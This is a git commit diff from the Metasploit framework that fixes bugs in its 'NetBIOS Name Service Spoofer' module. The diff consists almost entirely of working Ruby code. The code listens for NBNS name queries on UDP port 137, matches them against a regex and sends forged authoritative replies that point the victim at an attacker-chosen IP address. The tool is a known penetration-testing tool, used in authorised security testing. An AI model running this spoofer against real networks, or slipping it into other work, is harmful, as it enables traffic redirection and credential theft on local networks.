Fix a handful of bugs that broke this modules. Fixes rapid7#4799

HD Moore · HD Moore · commit 1b1716bcf639 · 2015-02-22T22:01:01.000-06:00
diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb
@@ -9,6 +9,9 @@ class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Capture
 
+  attr_accessor :sock, :thread
+
+
   def initialize
     super(
       'Name'           => 'NetBIOS Name Service Spoofer',
@@ -44,108 +47,144 @@ def initialize
     ])
 
     register_advanced_options([
-      OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false])
+      OptBool.new('DEBUG', [ false, "Determines whether incoming packet parsing is displayed", false])
     ])
 
     deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
+    self.thread = nil
+    self.sock = nil
   end
 
-  def run
-    check_pcaprub_loaded() # Check first since otherwise this is all for naught
-    # MacOS X workaround
-    ::Socket.do_not_reverse_lookup = true
+  def dispatch_request(packet, rhost, src_port)
+    rhost = ::IPAddr.new(rhost)
+     # `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
+    # addr like "::ffff:192.168.0.1" when the interface we're listening
+    # on has an IPv6 address. Convert it to just the v4 addr
+    if rhost.ipv4_mapped?
+      rhost = rhost.native
+    end
 
-    @sock = ::UDPSocket.new()
-    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
+    # Convert to string
+    rhost = rhost.to_s
 
-    @run = true
+    spoof = ::IPAddr.new(datastore['SPOOFIP'])
 
-    print_status("NBNS Spoofer started. Listening for NBNS requests...")
+    return if packet.length == 0
 
-    begin
+    nbnsq_transid      = packet[0..1]
+    nbnsq_flags        = packet[2..3]
+    nbnsq_questions    = packet[4..5]
+    nbnsq_answerrr     = packet[6..7]
+    nbnsq_authorityrr  = packet[8..9]
+    nbnsq_additionalrr = packet[10..11]
+    nbnsq_name         = packet[12..45]
+    decoded = ""
+    nbnsq_name.slice(1..-2).each_byte do |c|
+      decoded << "#{(c - 65).to_s(16)}"
+    end
+    nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
+    nbnsq_type         = packet[46..47]
+    nbnsq_class        = packet[48..49]
+
+    return unless nbnsq_decodedname =~ /#{datastore['REGEX']}/i
+
+    vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
+
+    if datastore['DEBUG']
+      print_status("transid:        #{nbnsq_transid.unpack('H4')}")
+      print_status("tlags:          #{nbnsq_flags.unpack('B16')}")
+      print_status("questions:      #{nbnsq_questions.unpack('n')}")
+      print_status("answerrr:       #{nbnsq_answerrr.unpack('n')}")
+      print_status("authorityrr:    #{nbnsq_authorityrr.unpack('n')}")
+      print_status("additionalrr:   #{nbnsq_additionalrr.unpack('n')}")
+      print_status("name:           #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
+      print_status("full name:      #{nbnsq_name.slice(1..-2)}")
+      print_status("decoded:        #{decoded}")
+      print_status("decoded name:   #{nbnsq_decodedname}")
+      print_status("type:           #{nbnsq_type.unpack('n')}")
+      print_status("class:          #{nbnsq_class.unpack('n')}")
+    end
 
-    while @run # Not exactly thrilled we can never turn this off XXX fix this sometime.
-      packet, addr = @sock.recvfrom(512)
-      src_port = addr[1]
-      rhost = addr[3]
+    # time to build a response packet - Oh YEAH!
+    response = nbnsq_transid +
+      "\x85\x00" + # Flags = response + authoratative + recursion desired +
+      "\x00\x00" + # Questions = 0
+      "\x00\x01" + # Answer RRs = 1
+      "\x00\x00" + # Authority RRs = 0
+      "\x00\x00" + # Additional RRs = 0
+      nbnsq_name + # original query name
+      nbnsq_type + # Type = NB ...whatever that means
+      nbnsq_class+ # Class = IN
+      "\x00\x04\x93\xe0" + # TTL = a long ass time
+      "\x00\x06" + # Datalength = 6
+      "\x00\x00" + # Flags B-node, unique = whatever that means
+      datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
+
+    pkt = PacketFu::UDPPacket.new
+    pkt.ip_saddr = Rex::Socket.source_address(rhost)
+    pkt.ip_daddr = rhost
+    pkt.ip_ttl = 255
+    pkt.udp_sport = 137
+    pkt.udp_dport = src_port
+    pkt.payload = response
+    pkt.recalc
+
+    capture_sendto(pkt, rhost)
+  end
 
-      break if packet.length == 0
+  def monitor_socket
+    while true
+      rds = [self.sock]
+      wds = []
+      eds = [self.sock]
 
-      nbnsq_transid      = packet[0..1]
-      nbnsq_flags        = packet[2..3]
-      nbnsq_questions    = packet[4..5]
-      nbnsq_answerrr     = packet[6..7]
-      nbnsq_authorityrr  = packet[8..9]
-      nbnsq_additionalrr = packet[10..11]
-      nbnsq_name         = packet[12..45]
-      decoded = ""
-      nbnsq_name.slice(1..-2).each_byte do |c|
-        decoded << "#{(c - 65).to_s(16)}"
+      r,_,_ = ::IO.select(rds,wds,eds,0.25)
+      if (r != nil and r[0] == self.sock)
+        packet, host, port = self.sock.recvfrom(65535)
+        dispatch_request(packet, host, port)
       end
-      nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
-      nbnsq_type         = packet[46..47]
-      nbnsq_class        = packet[48..49]
-
-      if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i)
-
-        vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
-
-        if datastore['DEBUG']
-          print_status("transid:        #{nbnsq_transid.unpack('H4')}")
-          print_status("tlags:          #{nbnsq_flags.unpack('B16')}")
-          print_status("questions:      #{nbnsq_questions.unpack('n')}")
-          print_status("answerrr:       #{nbnsq_answerrr.unpack('n')}")
-          print_status("authorityrr:    #{nbnsq_authorityrr.unpack('n')}")
-          print_status("additionalrr:   #{nbnsq_additionalrr.unpack('n')}")
-          print_status("name:           #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
-          print_status("full name:      #{nbnsq_name.slice(1..-2)}")
-          print_status("decoded:        #{decoded}")
-          print_status("decoded name:   #{nbnsq_decodedname}")
-          print_status("type:           #{nbnsq_type.unpack('n')}")
-          print_status("class:          #{nbnsq_class.unpack('n')}")
-        end
-
-        # time to build a response packet - Oh YEAH!
-        response = nbnsq_transid +
-          "\x85\x00" + # Flags = response + authoratative + recursion desired +
-          "\x00\x00" + # Questions = 0
-          "\x00\x01" + # Answer RRs = 1
-          "\x00\x00" + # Authority RRs = 0
-          "\x00\x00" + # Additional RRs = 0
-          nbnsq_name + # original query name
-          nbnsq_type + # Type = NB ...whatever that means
-          nbnsq_class+ # Class = IN
-          "\x00\x04\x93\xe0" + # TTL = a long ass time
-          "\x00\x06" + # Datalength = 6
-          "\x00\x00" + # Flags B-node, unique = whet ever that means
-          datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
-
-        open_pcap
-
-        p = PacketFu::UDPPacket.new
-        p.ip_saddr = Rex::Socket.source_address(rhost)
-        p.ip_daddr = rhost
-        p.ip_ttl = 255
-        p.udp_sport = 137
-        p.udp_dport = src_port
-        p.payload = response
-        p.recalc
-
-        capture_sendto(p, rhost)
-
-        close_pcap
-
-      else
-        vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
+    end
+  end
+
+  def run
+    check_pcaprub_loaded()
+    ::Socket.do_not_reverse_lookup = true  # Mac OS X workaround
+
+    # Avoid receiving extraneous traffic on our send socket
+    open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
+
+    self.sock = Rex::Socket.create_udp(
+      'LocalHost' => "0.0.0.0",
+      'LocalPort' => 137,
+      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+    add_socket(self.sock)
+    self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
+
+    self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
+      begin
+        monitor_socket
+      rescue ::Interrupt
+        raise $!
+      rescue ::Exception
+        print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
       end
+    }
+
+    print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
+
+    while thread.alive?
+      IO.select(nil, nil, nil, 0.25)
     end
+    print_status("NBNS Monitor thread exited...")
+  end
 
-    rescue ::Exception => e
-      print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
-    # Make sure the socket gets closed on exit
-    ensure
-      @sock.close
+  def cleanup
+    if self.thread and self.thread.alive?
+      self.thread.kill
+      self.thread = nil
     end
+    close_pcap
   end
+
 end
